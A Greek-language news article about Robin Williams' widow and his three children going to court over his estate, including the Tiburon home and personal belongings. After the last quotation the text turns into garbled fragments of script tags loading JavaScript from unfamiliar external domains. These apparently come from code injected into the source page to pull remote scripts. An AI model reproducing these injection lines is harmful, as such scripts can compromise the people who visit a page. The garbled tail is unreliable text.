Στα δικαστήρια τα παιδιά και η χήρα του Ρόμπιν Γουίλιαμς

Στα δικαστήρια τα παιδιά και η χήρα του Ρόμπιν Γουίλιαμς

Η χήρα του ηθοποιού Ρόμπιν Γουίλιαμς και τα τρία ενήλικα παιδιά του βρίσκονται στα δικαστήρια σχετικά με την περιουσία που άφησε πίσω του ο διάσημος κωμικός μετά το θάνατό του, μεταδίδει το πρακτορείο ειδήσεων Ρόιτερς επικαλούμενο δικαστικά έγγραφα.

Η διαμάχη αφορά σε πράγματα που ανήκαν στον διάσημο ηθοποιό, ο οποίος αυτοκτόνησε τον περασμένο Αύγουστο και περιλαμβάνουν από ρούχα και ρολόγια έως ορισμένα συλλεκτικά αντικείμενα.

Η Σούζαν Σνάιντερ Γουίλιαμς ισχυρίζεται ότι ο ηθοποιός είχε αφήσει στο όνομά της το σπίτι όπου διέμεναν στο Τίμπουρον της Καλιφόρνια καθώς και τα περισσότερα αντικείμενα που βρίσκονταν μέσα σε αυτό. Σε αναφορά που υπέβαλε στο Ανώτατο Δικαστήριο του Σαν Φρανσίσκο, η Σνάιντερ υποστηρίζει ότι ορισμένα αντικείμενα απομακρύνθηκαν από το σπίτι χωρίς την άδειά της και ότι «οι υπόλοιποι δικαιούχοι πιθανόν παραβίασαν το σπίτι της».

«Η Σούζαν Σνάιντερ Γουίλιαμς έχασε τον σύζυγός της μέσα από μια συγκλονιστική και συναισθηματικά φορτισμένη εμπειρία», αναφέρεται στο έγγραφο. «Από τότε που συνέβη το περιστατικό δεν της δόθηκε ο χρόνος να θρηνήσει για την απώλειά της χωρίς τις φρενήρεις παρεμβάσεις στην ιδιωτική της ηρεμία».

Σύμφωνα με την κατάθεση, ένα ακόμα σπίτι που ανήκε στον Γουίλιαμς καθώς και τα περισσότερα περιουσιακά του στοιχεία περνούν στα χέρια των τριών παιδιών του, του Ζάκαρι, της Ζέλντα και του Κόντι, τα οποία υποστηρίζουν ότι η Σνάιντερ προσπαθεί να «παραποιήσει» τη γλώσσα των εγγράφων ώστε να εξασφαλίσει μεγαλύτερο μερίδιο της περιουσίας του ηθοποιού.

«Τα παιδιά του Ρόμπιν δεν επιθυμούν κάτι παραπάνω από το να μείνουν στην ησυχία τους για να θρηνήσουν», δήλωσε ο εκπρόσωπός τους Άλλαν Μάγιερ. «Το γεγονός ότι αναγκάζονται να υπόκεινται σε αυτές τις νομικές διαδικασίες προσθέτει επιπλέον φόρτιση στην ήδη τραυματική τους εμπειρία».___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >